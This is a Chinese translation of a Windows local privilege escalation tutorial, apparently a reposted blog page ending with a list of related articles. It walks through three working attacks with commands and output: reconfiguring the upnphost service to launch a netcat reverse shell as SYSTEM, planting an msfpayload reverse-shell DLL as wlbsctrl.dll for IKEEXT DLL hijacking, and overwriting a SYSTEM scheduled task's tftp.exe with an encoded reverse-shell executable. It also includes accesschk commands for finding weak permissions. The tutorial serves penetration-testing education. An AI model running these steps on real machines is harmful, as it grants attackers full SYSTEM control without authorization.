SERVICE_ENUMERATE_DEPENDENTS
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
R BUILTIN\Power Users
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
Accesschk 可以自動化的檢測我們是否擁有一個 Windows 服務的寫入訪問許可權。作為一個低許可權使用者,我們通常希望檢查結果為 “Authenticated Users”。一定要去檢查你的使用者屬於哪個使用者組,舉個例子,“Power Users” 被認為是一個低許可權使用者組(儘管它沒有被廣泛使用)一起來比較一下在 Windows 8 和 Windows XP SP0 上輸出的不同
# This is on Windows 8.
C:\Users\b33f\tools\Sysinternals> accesschk.exe -uwcqv "Authenticated Users" *
No matching objects found.
# On a default Windows XP SP0 we can see there is a pretty big security fail.
C:\> accesschk.exe -uwcqv "Authenticated Users" *
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
C:\> accesschk.exe -ucqv SSDPSRV
SSDPSRV
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
RW NT AUTHORITY\LOCAL SERVICE
SERVICE_ALL_ACCESS
C:\> accesschk.exe -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
RW NT AUTHORITY\LOCAL SERVICE
SERVICE_ALL_ACCESS
這個問題在之後的 XP SP2 版本中得到了解決,然而在 SP0 和 SP1 它可以被用作一個通用的本地提權漏洞。通過重新配置該服務,我們可以讓它以 SYSTEM 許可權執行任何我們指定的二進位制檔案。讓我們來看看怎麼實踐操作,在這個例子裡該服務將會執行 netcat 並且可以反彈一個 SYSTEM 許可權的 shell。其它的操作方法當然也是可能存在的。
C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Universal Plug and Play Device Host
DEPENDENCIES : SSDPSRV
SERVICE_START_NAME : NT AUTHORITY\LocalService
C:\> sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
[SC] ChangeServiceConfig SUCCESS
C:\> sc config upnphost obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS
C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Universal Plug and Play Device Host
DEPENDENCIES : SSDPSRV
SERVICE_START_NAME : LocalSystem
C:\> net start upnphost
即使服務是不正確配置的,我們大多時候也不能獲取該服務完整的控制許可權。下圖是從 Brett Moore’s 在 Windows 提權方面的滲透測試,圖中的任一許可權都可以給我們一個 SYSTEM shell
重要的是去記住我們搞定的 session 是屬於哪個使用者組的,正如先前提到的 “Power Users” 被視為是一個低許可權使用者組。但 “Power Users” 也有一些屬於他們自己的配置漏洞, Mark Russinovich 已經在這個問題上寫了非常有趣的文章。
“Power Users” 的力量 ( Mark Russinovich )
最後,我們將會檢查檔案/目錄的許可權,如果我們不能直接攻擊計算機系統,我們就讓計算機做所有的繁重工作。由於這方面涉及內容太多,所以我將介紹兩種提權漏洞給你,並展示如何去利用它們。一旦你掌握了通用的思路,你將能夠在其它場景下應用這些技術。
例項一
作為第一個示例,我們將復現 GreyHatHacker 上 Parvez 的一篇文章中的方法。“利用低資料夾許可權提權”,這是一個很棒的提權思路,我非常推薦大家去閱讀。
這個示例是DLL 劫持中的一個特例。程式通常不能通過它們自身實現功能,它們需要掛載許多自身所需的資源(大多是 DLL 但也有某些特有檔案)。如果一個程式或服務從一個我們擁有寫許可權的目錄中裝載了檔案,那我們就可以藉此彈出一個與之相同許可權的 shell
通常一個 Windows 應用程式將會使用一個預定義的搜尋路徑去尋找 DLL 元件,而且它會以特定的順序檢查這些路徑。DLL 劫持經常是將一個惡意的 DLL 置於某一搜尋路徑中,並確保惡意 DLL 會在合法的 DLL 之前被找到。
以下是在32位作業系統下 DLL 查詢的順序
- 1 The directory from which the application loaded
- 2 32-bit System directory (C:\Windows\System32)
- 3 16-bit System directory (C:\Windows\System)
- 4 Windows directory (C:\Windows)
- 5 The current working directory (CWD)
- 6 Directories in the PATH environment variable (system then user)
有時應用程式想要載入的 DLL 可能不在主機上,引起該問題的原因有很多,比如當 DLL 檔案只存在於某個未安裝的外掛或者計算機特性(feature)時。在這種情況下, Parvez 發現某些 Windows 服務會去試圖載入預設安裝中不存在的 DLL。
但由於問題中的 DLL 不存在,所以我們將遍歷所有路徑。作為一個低許可權的使用者,也許我們可以去放置一個惡意 DLL 在上述路徑中的 1-4 中。而路徑 5 是行不通的,因為我們正在研究的是 Windows 服務,我們並沒有所有目錄的寫許可權
讓我們來看一下如何進行實戰,在本例中,我們將會利用需要載入 wlbsctrl.dll 的 IKEEXT (IKE and AuthIP IPsec Keying Modules) 服務
# This is on Windows 7 as low privilege user1. C:\Users\user1\Desktop> echo %username% user1 # We have a win here since any non-default directory in "C:\" will give write access to authenticated users. C:\Users\user1\Desktop> echo %path% C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\; C:\Program Files\OpenVPN\bin;C:\Python27 # We can check our access permissions with accesschk or cacls. C:\Users\user1\Desktop> accesschk.exe -dqv "C:\Python27" C:\Python27 Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Administrators FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS R BUILTIN\Users FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL RW NT AUTHORITY\Authenticated Users FILE_ADD_FILE FILE_ADD_SUBDIRECTORY FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE FILE_WRITE_ATTRIBUTES FILE_WRITE_EA DELETE SYNCHRONIZE READ_CONTROL C:\Users\user1\Desktop> cacls "C:\Python27" C:\Python27 BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C # Before we go over to action we need to check the status of the IKEEXT service. In this case we can see it is set to "AUTO_START" so it will launch on boot! C:\Users\user1\Desktop> sc qc IKEEXT [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IKEEXT TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IKE and AuthIP IPsec Keying Modules DEPENDENCIES : BFE SERVICE_START_NAME : LocalSystem現在必要的條件都已經滿足了,我們可以生成一個惡意的 DLL 並彈出一個 shell
root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 314
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 127.0.0.1 yes The listen address
LPORT 9988 yes The listen port
Description:
Connect back to attacker and spawn a command shell
root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D >
/root/Desktop/evil.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"lhost"=>"127.0.0.1", "lport"=>"9988"}
在將惡意 DLL 傳送到靶機之後,我們需要將它重新命名為 wlbsctrl.dll 並將它移動到 “C:\Python27” 路徑下。完成後,我們只需要耐心等待機器被重啟(或者我們可以嘗試強制重啟),之後我們就可以得到一個 SYSTEM shell。# Again, this is as low privilege user1.
C:\Users\user1\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 948D-A98F
Directory of C:\Users\user1\Desktop
02/18/2014 01:49 PM <DIR> .
02/18/2014 01:49 PM <DIR> ..
04/22/2013 09:39 AM 331,888 accesschk.exe
02/18/2014 12:38 PM 14,336 evil.dll
01/25/2014 12:46 AM 36,864 fubar.exe
01/22/2014 08:17 AM <DIR> incognito2
06/30/2011 01:52 PM 1,667,584 ncat.exe
11/22/2013 07:39 PM 1,225 wmic_info.bat
5 File(s) 2,051,897 bytes
3 Dir(s) 73,052,160 bytes free
C:\Users\user1\Desktop> copy evil.dll C:\Python27\wlbsctrl.dll
1 file(s) copied.
C:\Users\user1\Desktop> dir C:\Python27
Volume in drive C has no label.
Volume Serial Number is 948D-A98F
Directory of C:\Python27
02/18/2014 01:53 PM <DIR> .
02/18/2014 01:53 PM <DIR> ..
10/20/2012 02:52 AM <DIR> DLLs
10/20/2012 02:52 AM <DIR> Doc
10/20/2012 02:52 AM <DIR> include
01/28/2014 03:45 AM <DIR> Lib
10/20/2012 02:52 AM <DIR> libs
04/10/2012 11:34 PM 40,092 LICENSE.txt
04/10/2012 11:18 PM 310,875 NEWS.txt
04/10/2012 11:31 PM 26,624 python.exe
04/10/2012 11:31 PM 27,136 pythonw.exe
04/10/2012 11:18 PM 54,973 README.txt
10/20/2012 02:52 AM <DIR> tcl
10/20/2012 02:52 AM <DIR> Tools
04/10/2012 11:31 PM 49,664 w9xpopen.exe
02/18/2014 12:38 PM 14,336 wlbsctrl.dll
7 File(s) 523,700 bytes
9 Dir(s) 73,035,776 bytes free
萬事俱備,我們只需要等待機器重啟。出於演示目的,我在下面截圖中是使用管理員指令手動重啟該服務
對於我們最後的例子,我們將關注於計劃任務。回顧我們之前蒐集到的資訊,我們有以下條目
HostName: B33F
TaskName: \LogGrabberTFTP
Next Run Time: 2/19/2014 9:00:00 AM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: B33F\b33f
Task To Run: E:\GrabLogs\tftp.exe 10.1.1.99 GET log.out E:\GrabLogs\Logs\log.txt
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 9:00:00 AM
Start Date: 2/17/2014
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
這看起來像有一個 TFTP 客戶端連線到遠端主機去搜集某些 log 檔案。我們可以看到這個任務每日早9點以 SYSTEM 許可權執行,再看看我們是否有這個資料夾的寫入許可權C:\Users\user1\Desktop> accesschk.exe -dqv "E:\GrabLogs"
E:\GrabLogs
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Administrators
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_ADD_SUBDIRECTORY
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_EA
DELETE
SYNCHRONIZE
READ_CONTROL
R BUILTIN\Users
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_EA
FILE_TRAVERSE
SYNCHRONIZE
READ_CONTROL
C:\Users\user1\Desktop> dir "E:\GrabLogs"
Volume in drive E is More
Volume Serial Number is FD53-2F00
Directory of E:\GrabLogs
02/18/2014 11:34 PM <DIR> .
02/18/2014 11:34 PM <DIR> ..
02/18/2014 11:34 PM <DIR> Logs
02/18/2014 09:21 PM 180,736 tftp.exe
1 File(s) 180,736 bytes
3 Dir(s) 5,454,602,240 bytes free
顯然這是一個嚴重的配置問題,這個計劃任務根本不需要以 SYSTEM 許可權執行,但更糟糕的是任何授權的使用者都有該目錄的寫許可權。理想情況下,對於一次滲透測試我會抓取一個 TFTP 客戶端在裡面放一個後門,確保它仍然正常工作,再將其放回靶機。然而出於演示目的,我們可以簡單的通過 metasploit 生成一個二進位制檔案然後直接覆蓋它。root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 314
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 127.0.0.1 yes The listen address
LPORT 9988 yes The listen port
Description:
Connect back to attacker and spawn a command shell
root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' R | msfencode -t
exe > /root/Desktop/evil-tftp.exe x86/shikata_ga_nai succeeded with size 341 (iteration=1)
現在工作只剩下上傳我們的惡意可執行檔案並覆蓋掉 “E:\GrabLogs\tftp.exe” 檔案。一旦上傳成功,我們就可以去休息了,等到明早睡醒就可以得到我們的 shell 。對了,別忘記去檢查我們靶機的時間/時區
C:\Users\user1\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 948D-A98F
Directory of C:\Users\user1\Desktop
02/19/2014 01:36 AM <DIR> .
02/19/2014 01:36 AM <DIR> ..
04/22/2013 09:39 AM 331,888 accesschk.exe
02/19/2014 01:31 AM 73,802 evil-tftp.exe
01/25/2014 12:46 AM 36,864 fubar.exe
01/22/2014 08:17 AM <DIR> incognito2
06/30/2011 01:52 PM 1,667,584 ncat.exe
02/18/2014 12:38 PM 14,336 wlbsctrl.dll
11/22/2013 07:39 PM 1,225 wmic_info.bat
6 File(s) 2,125,699 bytes
3 Dir(s) 75,341,824 bytes free
C:\Users\user1\Desktop> copy evil-tftp.exe E:\GrabLogs\tftp.exe
Overwrite E:\GrabLogs\tftp.exe? (Yes/No/All): Yes
1 file(s) copied.
為了證明這次提權,我調快了系統時間。從以下截圖中可以看到,在早9點時我們得到了 SYSTEM shell
在思考獲取檔案/資料夾許可權時,這兩個示例應該會給你一些尋找漏洞的思路。真正的實戰中你可能需要花時間去檢查所有的Windows服務、計劃任務和開機任務的 binpaths
我們已經知道了 accesschk 是一種測試工具。在文章結束之前,我會再給你一些使用 accesschk 的技巧
# 當使用者第一次使用任何一個 sysinternals 工具包的工具時,使用者都會看到一個選擇是否接受EULA的彈出視窗,這顯然是一個大問題,但我們可以新增一個額外的引數來自動接受EULA
accesschk.exe /accepteula ... ... ...
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
最後的一些想法
本指南旨在成為Windows特權升級的“基礎”。如果你想真正掌握這個主題,你需要投入大量的工作和研究。就像所有的滲透測試一樣,舉一反三是關鍵,你對目標的瞭解越多,攻擊的途徑越多,成功的機率就越大。
還要記住,有時你可能會將你的許可權提升到管理員。從管理員到系統的提權是一個無關緊要的問題,你可以始終重新配置一個服務,或者建立一個具有系統級別特權的排程任務。
現在就去實踐,然後得到SYSTEM!!
原文:http://www.fuzzysecurity.com/tutorials/16.html
相關文章
- 提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權Windows伺服器SQL
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- windows提權 (一)Windows
- windows提權--組策略首選項提權Windows
- Windows提權總結Windows
- Windows提權系列————上篇Windows
- Windows提權系列————下篇Windows
- 提權 | Windows系統Windows
- Windows提權方式彙總Windows
- Windows令牌竊取提權和爛土豆提權學習Windows
- Windows提權實戰——————1、IIS6.exe提權實戰Windows
- Windows PrintDemon提權漏洞分析Windows
- Windows原理深入學習系列-Windows核心提權Windows
- Windows提權實戰————4、DLL注入Windows
- Linux、Windows提權命令速記LinuxWindows
- Windows提權實戰——————2、使用Hash直接登入WindowsWindows
- Linux提權————利用SUID提權LinuxUI
- 在Windows低許可權下利用服務進行提權Windows
- windows伺服器安全設定之提權篇Windows伺服器
- [提權禁區]1433埠入侵提權
- Linux提權-70種sudo提權彙總Linux
- SQL Sever提權SQL
- Linux 提權Linux
- mysql UDF提權MySql
- 利用for命令提權
- Linux提權Linux
- CVE-2022-26923 Windows域提權漏洞Windows
- Powershell 提權框架-Powerup框架
- Linux 提權-CapabilitiesLinux
- bulldog_1 提權
- MySQL UDF 提權初探MySql
- linux sudo提權Linux
- Linux提權-許可權升級Linux
- 最新發現!Windows 11也受本地提權漏洞HiveNightmare影響WindowsHive
- Linux提權————Linux下三種不同方式的提權技巧Linux
- Potato家族本地提權分析
- 提權學習筆記筆記
- mssqlserver xp_cmdshell提權SQLServer